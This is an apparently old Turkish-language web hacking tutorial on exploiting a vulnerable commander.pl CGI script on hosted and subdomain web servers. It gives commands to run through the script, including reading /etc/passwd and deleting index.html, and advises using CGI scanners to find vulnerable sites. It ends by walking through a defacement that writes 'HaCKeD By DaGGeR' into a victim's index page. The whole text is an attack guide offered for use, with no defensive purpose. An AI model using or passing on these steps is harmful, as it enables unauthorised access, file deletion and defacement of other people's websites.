| |
|
| |
|
Yazılar webdagger'dan alınmıştır Web Hack Herhangi Bir Subdomaine Linklenen Veya Tamamen Subdomain Uzerine Kurulmuş Web Serverlarını Commander.pl Açığı Ile Hackleyebiliriz Ornek Subdomain Serverımız |www.virtualave.net| Adres http://webdagger.virtualave.net Olsun Komutlar Ls: Dosya ve Klasörleri Gösterir: Ls /etc Cat: Dosya Içeriğini Gösterir: Cat /etc/passwd Pwd: Nerde Olduğumuzu Gösterir: Pwd Rm: Dosya Silme Işlemi Için Kullanılır: Rm index.html Mkdir: Yeni Klasör Açmaya Yarar: Mkdir webdagger http://webdagger.virtualave.net/commander.pl Pwd Ile Nerde Olduğumuza Bakıyoruz /www/home/usr/webdagger/ Şimdi Istediğimiz Klasöre Geçip Içeriğine Bakabiliriz Web Hack Commander.pl Açığı Ile Bir Başka Teknik Daha Var Cgi-Bin Scannerları Kullanarak www.hackedpage.com/cgi-bin/commander.pl Diye Arayabiliriz Bulma Şansımız Çok Yüksek Bulduğumuzu Farz Edelim www.hackedpage.com/cgi-bin/commander.pl Diye Giriyoruz Nerde Olduğumuzu Oğrenmek Için www.hackedpage.com/cgi-bin/commander.pl Pwd Yazıp Nerde Olduğumuza Bakıyoruz /home/www/usr/hackedpage/cgi-bin/ Çıkıyor Karşımıza Bu Sayfanın index ine HaCKeD By DaGGeR Yazmak Istiyoruz Mesela Echo Komutu Bizim Ihtiyacımızı Görür echo HaCKeD By DaGGeR /home/www/usr/hackedpage/index.html Yazıyoruz index.html De HaCKeD ßy DaGGeR Yazıyor..
